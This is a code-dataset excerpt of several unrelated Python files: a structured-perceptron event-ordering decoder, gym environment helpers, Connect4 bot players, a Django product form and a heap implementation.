for edge,weight in edge_weights])\n #except TypeError:\n # return None\n \n m.setObjective(objective,GRB.MINIMIZE)\n m.update()\n code = m.optimize()\n \n try:\n return [k for k,v in x_vars.items() if v.x > 0.98]\n except GurobiError:\n return None\n\ndef shuffle(L1,L2):\n \"Returns a random permutation of L1 and of L2 (the same permutation)\"\n if len(L1) != len(L2):\n raise Exception('Incompatible arguments')\n perm = random.sample(range(len(L1)),len(L1))\n L1 = [L1[ind] for ind in perm]\n L2 = [L2[ind] for ind in perm]\n return L1,L2\n\n#class LocalClassifier:\n# def __init__(self,num_features,num_iters,eta,averaged,vec_feature_names):\n# def save(self,filename):\n# def fit(self,vector_graphs,perms)\n# def predict(self,event_graph)\n#def fit()\n#def predict()\n#def test_on_data(\n#def test_on_data_from_file(\n\n\n \nclass StructuredPerceptron:\n \n def __init__(self,num_features,num_iters,eta,averaged,vec_feature_names,calc_train_accuracy=False,\\\n greedy_inference=False,model_pickle=None,time_limit=5,\\\n probs_instead_of_weights=False,sigma=0.1):\n self._num_features = num_features\n self._weights = numpy.matlib.zeros(shape=(1,num_features))\n self._num_iters = num_iters\n self._averaged = averaged\n self._eta = eta\n 
self._vec_feature_names = vec_feature_names\n self._calc_train_acc = calc_train_accuracy\n self._greedy_inference = greedy_inference\n self._probs_insteadOf_weights = probs_instead_of_weights\n self._model_pickle = model_pickle\n self._interm_averaged_model = numpy.matlib.zeros(shape=(1,num_features))\n self._interm_averaged_model_num_instances = 0\n self._sigma = sigma\n self._gradient_iter = 0\n self._obj_iter = 0\n gurobipy.setParam(\"TimeLimit\",time_limit)\n \n def save(self,filename):\n f = open(filename,'wb')\n pickle.dump(self,f)\n f.close()\n\n def set_time_limit(self,time_limit):\n print(str(time_limit)+' time limit set')\n gurobipy.setParam(\"TimeLimit\",time_limit)\n \n def fit(self,vector_graphs,perms):\n \"\"\"\n vector_graph is a list of graphs where each edge corresponds to a vector (numpy vectors, could be sparse).\n perms is a list of permutations. Each permutation is a collection of edges in the graph.\n \"\"\"\n if self._interm_averaged_model_num_instances > 0:\n # starting from a previously saved model\n sum_weight_vectors = self._interm_averaged_model * self._interm_averaged_model_num_instances\n done_instances = self._interm_averaged_model_num_instances\n print('x')\n else:\n done_instances = 0\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n \n vector_graphs, perms = shuffle(vector_graphs,perms)\n learning_curve_pairs = [(0,0) for x in vector_graphs]\n learning_curve_triples = [(0,0) for x in vector_graphs]\n learning_curve_quads = [(0,0) for x in vector_graphs]\n exact_matches = [0 for x in vector_graphs]\n seen_instances = [0 for x in vector_graphs]\n total_instances_seen = 0\n save_gap = 5000 #000 # 5000 # the maximum number of instances between pickles\n for ind in range(self._num_iters):\n instance_index = 0\n error_instances = []\n for G,correct_perm in zip(vector_graphs,perms):\n if total_instances_seen >= done_instances:\n if self._greedy_inference:\n predicted_perm = self.greedy_inference(G)\n else:\n predicted_perm = find_min_hamiltonian_path(G,self._weights)\n if predicted_perm == None:\n continue\n self._weights = self._weights + \\\n (self._eta * ( G.get_sum_path(correct_perm) - G.get_sum_path(predicted_perm) )).todense()\n try:\n predicted_perm_c = convert_edges_perm(predicted_perm)\n correct_perm_c = convert_edges_perm(correct_perm)\n learning_curve_pairs[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,2)\n learning_curve_triples[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,3)\n learning_curve_quads[instance_index] = \\\n num_agreeing_tuples(predicted_perm_c,correct_perm_c,4)\n seen_instances[instance_index] = 1\n exact_matches[instance_index] = (1 if set(predicted_perm) == set(correct_perm) else 0) \n self.print_learning_curve(ind,instance_index,learning_curve_pairs,learning_curve_triples,\\\n learning_curve_quads,1.0*sum(exact_matches)/sum(seen_instances))\n sum_weight_vectors = sum_weight_vectors + self._weights\n except Exception:\n error_instances.append(instance_index)\n print('Incorrect decoding in training. 
Instance '+str(ind)+' '+str(instance_index))\n instance_index += 1\n total_instances_seen += 1\n if len(perms) > save_gap and self._model_pickle and total_instances_seen % save_gap == 0:\n self._interm_averaged_model = sum_weight_vectors / total_instances_seen\n self._interm_averaged_model_num_instances = total_instances_seen\n f_pickle = open(self._model_pickle+'_'+str(total_instances_seen)+'inst','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._calc_train_acc:\n print('Training accuracy iteration #'+str(ind)+':'+str(self.test_on_data(vector_graphs,perms)))\n if self._model_pickle:\n self._interm_averaged_model = sum_weight_vectors / ((ind+1) * len(perms))\n self._interm_averaged_model_num_instances = (ind+1) * len(perms)\n f_pickle = open(self._model_pickle+'_iter'+str(ind),'w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n self._interm_averaged_model = self._weights\n self._interm_averaged_model_num_instances = (self._num_iters * len(perms))\n if self._model_pickle:\n f_pickle = open(self._model_pickle+'_averaged','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+str(self.test_on_data(vector_graphs,perms)))\n return error_instances\n\n def fit_mbr(self,vector_graphs,perms):\n feature_vectors = [G._vecs for G in vector_graphs]\n \n batches = [[[e_ind for e_ind,e in enumerate(G.edges()) if e[0] == v] \\\n for v in G.vertices() if v != END_NODE] for G in vector_graphs]\n\n correct_rows = []\n for G,perm in zip(vector_graphs,perms):\n correct_rows.append([index for index,e in enumerate(G.edges()) if e in perm])\n \n x0 = self._weights\n w = scipy.optimize.fmin_l_bfgs_b(scipy_minus_objective, x0, fprime=scipy_minus_gradient, \n args=(feature_vectors,correct_rows,batches,self._sigma,self),pgtol=0.01)\n print('LBFGS Converged.')\n sys.stdout.flush()\n self._weights = numpy.reshape(w[0],(1,self._num_features))\n\n if self._model_pickle:\n self._interm_averaged_model = self._weights\n f_pickle = open(self._model_pickle+'_bfgs','w')\n pickle.dump(self,f_pickle,pickle.HIGHEST_PROTOCOL)\n f_pickle.close()\n \n def print_vec(self,v,prefix):\n sys.stdout.write(prefix+'\\n')\n for ind in range(v.shape[1]):\n if v[0,ind] != 0:\n sys.stdout.write(str(self._vec_feature_names[ind])+':'+str(v[0,ind])+' ')\n sys.stdout.write('\\n')\n \n def print_learning_curve(self,iter_ind,instance_ind,all_pair_swaps,all_triple_swaps,all_quad_swaps,exact_match):\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in all_pair_swaps]) / sum([p[1] for p in all_pair_swaps])\n macro_avg_triple_swaps = 1.0 * sum([p[0] for p in all_triple_swaps]) / sum([p[1] for p in all_triple_swaps])\n macro_avg_quad_swaps = 1.0 * sum([p[0] for p in all_quad_swaps]) / sum([p[1] for p in all_quad_swaps])\n print(' '.join(['Learning curve:',str(iter_ind),str(instance_ind),str(macro_avg_pair_swaps),\\\n str(macro_avg_triple_swaps),str(macro_avg_quad_swaps),str(exact_match)]))\n\n \"\"\"\n def old_local_fit(self,vector_graphs,perms):\n\n same as fit, but does the fitting not using a structured perceptron, but \n using a regular perceptron.\n vector_graphs, perms = shuffle(vector_graphs,perms)\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n for ind in range(self._num_iters):\n instance_index = 0\n for G,correct_perm in zip(vector_graphs,perms):\n edge_weights = dict([(e,-w) for e,w in 
G.get_edge_weights(self._weights)])\n #labeled_edges = [((e[1],e[0]),-1) for e in G.edges()] + \\\n # [(e,1) for e in predicted_perm]\n for e in correct_perm:\n if edge_weights[e] <= 0: # if incorrectly negative\n self._weights = self._weights + self._eta * G.get_vec(e)\n inv_e = (e[1],e[0])\n if inv_e in edge_weights and edge_weights[inv_e] >= 0: # if incorrectly negative\n self._weights = self._weights - self._eta * G.get_vec(inv_e)\n print(instance_index,len(self._vec_feature_names),self._weights.size,np.linalg.norm(self._weights))\n sum_weight_vectors = sum_weight_vectors + self._weights\n instance_index += 1\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+ str(self.test_on_data(vector_graphs,perms)) )\n \"\"\"\n \n def local_fit(self,vector_graphs,perms):\n \"\"\"\n same as fit, but treats the problem as a binary problem of distinguishing between\n correct and incorrect edges. \n \"\"\"\n vector_graphs, perms = shuffle(vector_graphs,perms)\n sum_weight_vectors = np.zeros(shape=self._weights.shape)\n for ind in range(self._num_iters):\n instance_index = 0\n for G,correct_perm in zip(vector_graphs,perms):\n predicted_perm = self.predict(G)\n if predicted_perm == None:\n continue\n for e in G.edges():\n if e in correct_perm and e not in predicted_perm:\n self._weights = self._weights + self._eta * G.get_vec(e).transpose()\n if e not in correct_perm and e in predicted_perm:\n self._weights = self._weights - self._eta * G.get_vec(e).transpose()\n print('Instance #'+str(instance_index)+' '+str(self._weights.size,np.linalg.norm(self._weights)))\n sum_weight_vectors = sum_weight_vectors + self._weights\n instance_index += 1\n if self._averaged:\n self._weights = sum_weight_vectors / (self._num_iters * len(perms))\n if self._calc_train_acc:\n print('Training accuracy (after averaging):'+ str(self.test_on_data(vector_graphs,perms)) )\n \n def predict(self,event_graph):\n \"\"\"\n Returns the predicted permutation for the event graph.\n \"\"\"\n if self._greedy_inference:\n return self.greedy_inference(event_graph)\n elif self._probs_insteadOf_weights:\n return find_min_hamiltonian_path(event_graph,self._weights,True)\n else:\n return find_min_hamiltonian_path(event_graph,self._weights)\n \n def greedy_inference(self,event_graph):\n edge_weights = event_graph.get_edge_weights(self._weights)\n if self._probs_insteadOf_weights:\n edge_weights = weights_to_probs(event_graph,edge_weights)\n predicted_perm = []\n non_visited_nodes = set([v for v in event_graph.vertices() if v not in [START_NODE,END_NODE]])\n cur_node = START_NODE\n while len(non_visited_nodes) > 0:\n possible_edges = [(cur_node,v) for v in non_visited_nodes]\n L = [(e,w) for e,w in edge_weights if e in possible_edges]\n np.random.shuffle(L)\n e_max = min(L,key=lambda x:x[1])[0]\n predicted_perm.append(e_max)\n non_visited_nodes.remove(e_max[1])\n cur_node = e_max[1]\n predicted_perm.append((cur_node,END_NODE))\n return predicted_perm\n\n def binary_classification(self,test_samples,test_labels):\n \"\"\"\n Computes how often is the correct path more highly ranked than a random one.\n \"\"\"\n num_correct = 0\n num_samples = 0\n for sample,perm in zip(test_samples,test_labels):\n if len(sample.vertices()) == 3:\n continue\n minus_edge_weights = sample.get_edge_weights(self._weights)\n S_correct = 0.0\n S_all = 0.0\n for e,w in minus_edge_weights:\n if e == (START_NODE,END_NODE):\n continue\n if e in perm:\n S_correct += 
-1 * w\n S_all += -1 * w\n S_avg = S_all / (len(sample.vertices()) - 2)\n if S_correct > S_avg:\n num_correct += 1\n elif S_correct == S_avg:\n num_correct += 0.5\n num_samples += 1\n if num_samples % 50 == 0:\n print(num_samples)\n return 1.0 * num_correct / num_samples\n \n def greedy_inference2(self,event_graph):\n \"\"\"\n Greedy inference, but a different heuristic. It first selects the heaviest edge in the graph,\n then the second etc.\n \"\"\"\n edge_weights = event_graph.get_edge_weights(self._weights)\n if self._probs_insteadOf_weights:\n edge_weights = weights_to_probs(event_graph,edge_weights)\n predicted_perm = []\n vertex_out = set(event_graph.vertices())\n vertex_in = set(event_graph.vertices())\n while len(vertex_out) > 1 and len(vertex_in) > 1:\n possible_edges_weights = [(e,w) for e,w in edge_weights \\\n if e[0] in vertex_out and e[1] in vertex_in]\n np.random.shuffle(possible_edges_weights)\n e_max = max(possible_edges_weights,key=lambda x:x[1])[0]\n vertex_out.remove(e_max[0])\n vertex_in.remove(e_max[1])\n predicted_perm.append(e_max)\n predicted_perm.extend([(START_NODE,v) for v in vertex_in])\n predicted_perm.extend([(END_NODE,v) for v in vertex_in])\n return predicted_perm\n \n def objective(self,vector_graphs,perms):\n pass\n \n def test_on_data(self,vector_graphs,correct_perms,output_file=None):\n total_instances = 0\n exact_match = 0\n all_pair_swaps = []\n all_triple_swaps = []\n all_quad_swaps = []\n errs = []\n for G,correct_perm in zip(vector_graphs,correct_perms):\n predicted_perm = self.predict(G)\n if predicted_perm is None:\n predicted_perm = self.greedy_inference(G)\n print('Test instance '+str(total_instances)+': ILP failed. Reverting to greedy method.')\n print('Test instance '+str(total_instances)+' processed')\n if output_file:\n output_file.write('Instance #'+str(total_instances)+'\\n'+ \\\n str(predicted_perm)+'\\n'+str(correct_perm)+'\\n========\\n')\n total_instances += 1\n if total_instances % 100 == 0 and output_file:\n output_file.flush()\n try:\n if set(predicted_perm) == set(correct_perm):\n exact_match += 1\n predicted_perm_c = convert_edges_perm(predicted_perm)\n correct_perm_c = convert_edges_perm(correct_perm)\n pair_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,2)\n triple_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,3)\n quad_swaps = num_agreeing_tuples(predicted_perm_c,correct_perm_c,4)\n all_pair_swaps.append(pair_swaps)\n all_triple_swaps.append(triple_swaps)\n all_quad_swaps.append(quad_swaps)\n self.print_learning_curve('Test',total_instances,all_pair_swaps,all_triple_swaps,\\\n all_quad_swaps,1.0*exact_match/total_instances)\n except Exception as e:\n errs.append(total_instances)\n\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in all_pair_swaps]) / sum([p[1] for p in all_pair_swaps])\n macro_avg_triple_swaps = 1.0 * sum([p[0] for p in all_triple_swaps]) / sum([p[1] for p in all_triple_swaps])\n macro_avg_quad_swaps = 1.0 * sum([p[0] for p in all_quad_swaps]) / sum([p[1] for p in all_quad_swaps])\n #micro_avg_pair_swaps = 1.0 * sum(kandall_tau) / len(kandall_tau)\n \n return 1.0 * exact_match / total_instances, macro_avg_pair_swaps, macro_avg_triple_swaps, macro_avg_quad_swaps, errs\n\n\n \n \"\"\"\n def test_on_data_from_file(self,feat_extractor,test_file):\n total_instances = 0\n exact_match = 0\n kandall_tau = []\n swap_pairs = []\n for recipe,correct_perm in driver.read_recipe(test_file):\n G = feat_extractor.extract_features(recipe)\n predicted_perm = self.predict(G)\n total_instances += 1\n if 
predicted_perm == correct_perm:\n exact_match += 1\n tau, pair_swaps = get_permutation_scores(predicted_perm,correct_perm)\n kandall_tau.append(tau)\n swap_pairs.append(pair_swaps)\n\n macro_avg_pair_swaps = 1.0 * sum([p[0] for p in swap_pairs]) / sum([p[1] for p in swap_pairs])\n micro_avg_pair_swaps = 1.0 * sum(kandall_tau) / len(kandall_tau)\n\n return 1.0 * exact_match / total_instances, macro_avg_pair_swaps, micro_avg_pair_swaps\n \"\"\"\n\ndef weights_to_probs(G,edge_weights):\n \"\"\"\n Receives a graph and a list of pairs of edges and weights. Normalizes the score of each node to 1.\n \"\"\"\n new_edge_weights = []\n for v in G.vertices():\n outgoing_edges = [e for e in G.edges() if e[0] == v]\n outgoing_edge_weights = [(e,math.exp(w)) for e,w in edge_weights if e in outgoing_edges]\n S = sum([x[1] for x in outgoing_edge_weights])\n new_edge_weights.extend([(e,w/S) for e,w in outgoing_edge_weights])\n return new_edge_weights\n\ndef get_permutation_scores(predicted_perm,correct_perm):\n #micro = []\n macro = []\n for k in [2,3,4]:\n tuple_swaps = num_agreeing_tuples(convert_edges_perm(predicted_perm),convert_edges_perm(correct_perm),k)\n macro.append(tuple_swaps)\n #num_swaps(convert_edges_perm(predicted_perm),convert_edges_perm(correct_perm))\n #if tuple_swaps[1] > 0:\n # micro.append(1.0 * pair_swaps[0] / pair_swaps[1])\n #else:\n # micro.append(None)\n return macro\n\n\ndef convert_edges_perm(edges):\n \"\"\"\n receives a list of pairs (edges) that form a permutation. \n returns a list of the nodes according to the permutation (starting with START_NODE).\n \"\"\"\n L = dict(edges)\n output = [START_NODE]\n while output[-1] != END_NODE:\n output.append(L[output[-1]])\n if len(edges) + 1 != len(output):\n raise Exception()\n return output\n\n\ndef num_swaps(perm1,perm2):\n \"\"\"\n Determines the number of swaps between perm1 and perm2.\n Each of the lists is a list of unique numbers.\n The first and the last element are assumed to be fixed and are excluded.\n \"\"\"\n if len(perm1) != len(perm2) or len(set(perm1)) != len(perm1) or len(set(perm2)) != len(perm2):\n raise Exception(\"Incompatible lists\")\n perm1 = perm1[1:-1]\n perm2 = perm2[1:-1]\n agree = 0\n disagree = 0\n for pair1,pair2 in itertools.combinations(zip(perm1,perm2),2):\n if (pair1[0] > pair2[0] and pair1[1] > pair2[1]) or (pair1[0] < pair2[0] and pair1[1] < pair2[1]):\n agree += 1\n else:\n disagree += 1\n return agree, agree+disagree\n\ndef num_agreeing_tuples(perm1,perm2,k):\n \"\"\"\n same as num_swaps, but for k-tuples.\n \"\"\"\n if len(perm1) != len(perm2) or len(set(perm1)) != len(perm1) or len(set(perm2)) != len(perm2):\n raise Exception(\"Incompatible lists\")\n perm1 = perm1[1:-1]\n perm2 = perm2[1:-1]\n agree = 0\n disagree = 0\n for index_tuple in itertools.combinations(range(len(perm1)),k):\n tuple1 = [perm1[ind] for ind in index_tuple]\n tuple2 = [perm2[ind] for ind in index_tuple]\n ordered_tuple1 = sorted(tuple1)\n ordered_tuple2 = sorted(tuple2)\n ordinals1 = [bisect.bisect_left(ordered_tuple1,x) for x in tuple1]\n ordinals2 = [bisect.bisect_left(ordered_tuple2,x) for x in tuple2]\n if ordinals1 == ordinals2:\n agree += 1\n else:\n disagree += 1\n return agree,agree+disagree\n\n\n#####################################################\n# SCIPY METHODS\n#####################################################\n\ndef scipy_minus_gradient(w,all_vector_graphs,all_correct_rows,\\\n all_batches,sigma=None,perceptron=None):\n \"\"\"\n Returns the minus gradient of the log likelihood.\n vector_graphs is a list 
of all the vectors in the training data.\n correct_rows are the row indices of the correct edges.\n batches is the list of indices corresponding to each vertex.\n \"\"\"\n if perceptron:\n perceptron._gradient_iter += 1\n g = None\n index = 0\n for vector_graphs,correct_rows,batches in zip(all_vector_graphs,all_correct_rows,all_batches):\n first_term = vector_graphs[correct_rows,:].sum(axis=0)\n all_scores = vector_graphs * w\n all_probs = []\n for batch in batches:\n batch_scores = all_scores[batch]\n S = logsumexp(batch_scores)\n all_probs.append(np.exp(batch_scores - S))\n all_probs = numpy.hstack(all_probs)\n second_term = all_probs * vector_graphs\n if g is None:\n g = second_term - first_term\n else:\n g = g + second_term - first_term\n index += 1\n if index % 100 == 0:\n print('Gradient '+str(index)+' processed')\n g = numpy.ndarray.flatten(numpy.asarray(g)) / len(all_vector_graphs)\n if sigma != None:\n g = g + sigma * w\n print('Gradient norm:'+str(scipy.linalg.norm(g)))\n sys.stdout.flush()\n if perceptron and perceptron._model_pickle:\n if perceptron._gradient_iter % 5 == 0:\n perceptron._weights = numpy.reshape(w,(1,perceptron._num_features))\n perceptron.save(perceptron._model_pickle+'_'+str(perceptron._gradient_iter))\n return g\n\ndef scipy_minus_objective(w,all_vector_graphs,all_correct_rows,\\\n all_batches,sigma=None,perceptron=None):\n \"\"\"\n Returns the minus log-likelihood of the data.\n vector_graphs is a matrix of all the vectors in the training data.\n correct_rows are the row indices of the correct edges.\n batches is the list of indices corresponding to each vertex.\n \"\"\"\n if perceptron:\n perceptron._obj_iter += 1\n obj = 0.0\n index = 0\n for vector_graphs,correct_rows,batches in zip(all_vector_graphs,all_correct_rows,all_batches):\n all_scores = vector_graphs * w\n sum_log_Z = 0.0\n for batch in batches:\n batch_scores = all_scores[batch]\n sum_log_Z += logsumexp(batch_scores) #np.log(np.exp(batch_scores).sum())\n obj += all_scores[correct_rows].sum() - sum_log_Z\n index += 1\n if index % 100 == 0:\n print('Objective '+str(index)+' processed')\n obj = obj / len(all_vector_graphs)\n if sigma != None:\n obj += - 0.5 * sigma * (w * w).sum()\n print('Objective:'+str(obj))\n return -1.0 * obj\n\ndef exp_and_normalize_vec(v):\n S = logsumexp(v)\n return np.exp(v - S), S\n\n\n\nif __name__ == '__main__':\n print(num_agreeing_tuples([],[],4))\n S = 0\n S2 = 0 \n for s in range(200):\n random.seed(s)\n L1 = random.sample(range(20),20)\n L2 = random.sample(range(20),20)\n S += num_agreeing_tuples(L1,L2,4)[0]\n S2 += num_agreeing_tuples(L1,L2,4)[1]\n print(S, S2)\n \n","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":30983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"618581245","text":"\"\"\"\nHelpers for dealing with vectorized environments.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom contextlib import contextmanager\nimport sys\n\nimport gym\nimport numpy as np\n\n\n@contextmanager\ndef stdout_redirected(new_stdout):\n saved_stdout = sys.stdout\n sys.stdout = new_stdout\n try:\n yield None\n finally:\n sys.stdout.close()\n sys.stdout = saved_stdout\n\ndef copy_obs_dict(obs):\n \"\"\"\n Deep-copy an observation dict.\n \"\"\"\n return {k: np.copy(v) for k, v in obs.items()}\n\n\ndef dict_to_obs(obs_dict):\n \"\"\"\n Convert an observation dict into a raw array if the\n original observation space was not a Dict space.\n \"\"\"\n if set(obs_dict.keys()) == 
{None}:\n        return obs_dict[None]\n    return obs_dict\n\n\ndef obs_space_info(obs_space):\n    \"\"\"\n    Get dict-structured information about a gym.Space.\n    Returns:\n    A tuple (keys, shapes, dtypes):\n    keys: a list of dict keys.\n    shapes: a dict mapping keys to shapes.\n    dtypes: a dict mapping keys to dtypes.\n    \"\"\"\n    if isinstance(obs_space, gym.spaces.Dict):\n        assert isinstance(obs_space.spaces, OrderedDict)\n        subspaces = obs_space.spaces\n    else:\n        subspaces = {None: obs_space}\n    keys = []\n    shapes = {}\n    dtypes = {}\n    for key, box in subspaces.items():\n        keys.append(key)\n        shapes[key] = box.shape\n        dtypes[key] = box.dtype\n    return keys, shapes, dtypes\n\n\ndef obs_to_dict(obs):\n    \"\"\"\n    Convert an observation into a dict.\n    \"\"\"\n    if isinstance(obs, dict):\n        return obs\n    return {None: obs}\n\n\ndef print_dic(dic):\n    for key in dic.keys():\n        if isinstance(dic[key], dict):\n            print(key, \":\")\n            for items in dic[key]:\n                print(\" %s : %s\" % (items, dic[key][items]))\n        else:\n            print(key, ':', dic[key])\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"505942187","text":"# Name: Grant Messner\n# CMS cluster login name: gmessner\n\n'''\nfinal_players.py\n\nThis module contains code for various bots that play Connect4 at varying\ndegrees of sophistication.\n'''\n\nimport random\nfrom Connect4Simulator import *\nimport copy\n\n\nclass RandomPlayer:\n    '''\n    This player makes one of the possible moves on the game board,\n    chosen at random.\n    '''\n    def chooseMove(self, board, player):\n        '''\n        Given the current board and player number, choose and return a move.\n\n        Arguments:\n        board -- a Connect4Board instance\n        player -- either 1 or 2\n\n        Precondition: There must be at least one legal move.\n        Invariant: The board state does not change.\n        '''\n\n        assert player in [1, 2]\n        possibles = board.possibleMoves()\n        assert possibles != []\n        return random.choice(possibles)\n\n\nclass SimplePlayer:\n    '''\n    This player will always play a move that gives it a win if there is one.\n    Otherwise, it picks a random legal move.\n    '''\n\n    def chooseMove(self, board, player):\n        '''\n        Given the current board and player number, choose and return a move.\n\n        Arguments:\n        board -- a Connect4Board instance\n        player -- either 1 or 2\n\n        Precondition: There must be at least one legal move.\n        Invariant: The board state does not change.\n        '''\n        assert player in [1, 2]\n        moves = board.possibleMoves()\n        assert moves != []\n        for i in moves:\n            if board.isWinningMove(i, player):\n                return i\n        return random.choice(moves)\n\n\nclass BetterPlayer:\n    '''\n    This player will always play a move that gives it a win if there is one.\n    Otherwise, it tries all moves, collects all the moves which don't allow\n    the other player to win immediately, and picks one of those at random.\n    If there is no such move, it picks a random move.\n    '''\n\n    def chooseMove(self, board, player):\n        '''\n        Given the current board and player number, choose and return a move.\n\n        Arguments:\n        board -- a Connect4Board instance\n        player -- either 1 or 2\n\n        Precondition: There must be at least one legal move.\n        Invariant: The board state does not change.\n        '''\n        assert player in [1, 2]\n        moves = board.possibleMoves()\n        assert moves != []\n        for i in moves:\n            if board.isWinningMove(i, player):\n                return i\n        oppWinningMoves = []\n        for j in moves:\n            board.makeMove(j, player)\n            newMoves = board.possibleMoves()\n            for k in newMoves:\n                if board.isWinningMove(k, 3 - player):\n                    oppWinningMoves.append(j)\n            board.unmakeMove(j)\n        goodMoves = copy.deepcopy(moves)\n        for o in oppWinningMoves:\n            if o in goodMoves:\n                goodMoves.remove(o)\n        if goodMoves != []:\n            return random.choice(goodMoves)\n        else:\n            return random.choice(moves)\n\nclass Monty:\n    '''\n    This player will randomly simulate games for each possible move,\n    picking the one that has the highest probability of success.\n    '''\n\n    def __init__(self, n, player):\n        '''\n        Initialize the player using a simpler computer player.\n\n        Arguments:\n        n -- number of games to simulate.\n        player -- the computer player\n        '''\n        assert n > 0\n        self.player = player\n        self.n = n\n\n    def chooseMove(self, board, player):\n        '''\n        Given the current board and player number, choose and return a move.\n\n        Arguments:\n        board -- a Connect4Board instance\n        player -- either 1 or 2\n\n        Precondition: There must be at least one legal move.\n        Invariant: The board state does not change.\n        '''\n        assert player in [1, 2]\n        moves = board.possibleMoves()\n        assert moves != []\n        for i in moves:\n            if board.isWinningMove(i, player):\n                return i\n        winCounts = {}\n        for j in moves:\n            cloneBoard = board.clone()\n            cloneBoard.makeMove(j, player)\n            numWins = 0\n            for k in range(0, self.n):\n                sim = Connect4Simulator(cloneBoard, self.player, self.player, \\\n                                        3 - player)\n                result = sim.simulate()\n                if result == player:\n                    numWins += 1\n                cloneBoard = board.clone()\n                cloneBoard.makeMove(j, player)\n            winCounts[j] = numWins\n        maxWins = 0\n        for val in winCounts.values():\n            if val > maxWins:\n                maxWins = val\n        for key in winCounts.keys():\n            if winCounts[key] == maxWins:\n                return key\n","sub_path":"Desktop/CS1/Final/final_players.py","file_name":"final_players.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"102267346","text":"from django import forms\nfrom .models import *\nfrom django.core.exceptions import ValidationError\n\n\ndef weight_validate(value):\n    if not str(value).isdigit():\n        raise ValidationError('Please enter a valid number')\n\n\nclass ProductForm(forms.ModelForm):\n    # extra field that is not part of the model\n    productID = forms.CharField(max_length=20, label='Product ID')\n\n    # model and form settings\n    class Meta:\n        # bind the model\n        model = Product\n        fields = '__all__'\n        exclude = []\n        # set the field labels\n        labels = {\n            'name': 'Product name',\n            'weight': 'Weight',\n            'size': 'Size',\n            'type': 'Product type',\n        }\n        widgets = {'name': forms.widgets.TextInput(attrs={'class': 'c1'})}\n        # define the field types\n        field_classes = {'name': forms.CharField}\n        help_texts = {'name': ''}\n        error_messages = {\n            '__all__': {'required': 'Please enter a value',\n                        'invalid': 'Please check the input'},\n            'weight': {'required': 'Please enter a weight value',\n                       'invalid': 'Please check that the value is correct'}\n        }\n\n    def clean_weight(self):\n        data = self.cleaned_data['weight']\n        return data + 'g'\n","sub_path":"index/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"174150137","text":"import math\n\ndef height(n, root=0):\n    return math.floor(math.log(n, 2)) - math.floor(math.log(root + 1, 2))\n\n\ndef parent(i):\n    return math.ceil(i/2)-1\n\n\ndef right(heap, root=0, size=None):\n    # size bounds the part of the array that is treated as the heap\n    if size is None:\n        size = len(heap)\n    i = (root+1)*2\n    if i >= size:\n        return None\n    return i\n\n\ndef left(heap, root=0, size=None):\n    if size is None:\n        size = len(heap)\n    i = (root+1)*2-1\n    if i >= size:\n        return None\n    return i\n\n\ndef heapify(heap, root=0, size=None):\n    left_i = left(heap, root, size)\n    right_i = right(heap, root, size)\n\n    if left_i is not None and heap[left_i] > heap[root] and (right_i is None or heap[right_i] <= heap[left_i]):\n        heap[root], heap[left_i] = heap[left_i], heap[root]\n        heapify(heap, left_i, size)\n    elif right_i is not None and heap[right_i] > heap[root]:\n        heap[root], heap[right_i] = heap[right_i], heap[root]\n        heapify(heap, right_i, size)\n\n\ndef build(array):\n    for i in range(math.floor(len(array)/2), -1, -1):\n        heapify(array, i)\n\n\ndef sort(array):\n    build(array)\n\n    # repeatedly move the maximum to the end and re-heapify the shrinking prefix\n    for size in range(len(array)-1, 0, -1):\n        array[0], array[size] = array[size], array[0]\n        heapify(array, 0, size)\n\n    return array\n\n\nclass Heap:\n    def __init__(self, array):\n        build(array)\n        self._array = array\n\n    def __getitem__(self, item):\n        return self._array[item]\n\n    def __setitem__(self, key, value):\n        self._array[key] = value\n\n    def __len__(self):\n        return len(self._array)\n\n    def __delitem__(self, key):\n        del self._array[key]\n\n    def add(self, item):\n        self._array.append(item)\n        where = len(self._array)-1\n        while where != 0 and self[parent(where)] < item:\n            new_where = parent(where)\n            self[where], self[new_where] = self[new_where], self[where]\n            where = new_where\n\n    def extract(self, node=0):\n        item = self[node]\n        # move the last element into the hole, then restore the heap property\n        last = self._array.pop()\n        if node < len(self._array):\n            self[node] = last\n            while node != 0 and self[parent(node)] < self[node]:\n                new_node = parent(node)\n                self[node], self[new_node] = self[new_node], self[node]\n                node = new_node\n            heapify(self._array, node)\n        return item\n\n    def print(self, level=0):\n        if level > height(len(self)):\n            return\n\n        nodes = self[2**level-1:2**(level+1)-1]\n        nodes.extend(['X']*(2**level - len(nodes)))\n        below = max(1, 2**(height(len(self))-level+1)-1)\n        print(''.join([str(node)+'-'*(below) for node in nodes]))\n        self.print(level+1)","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
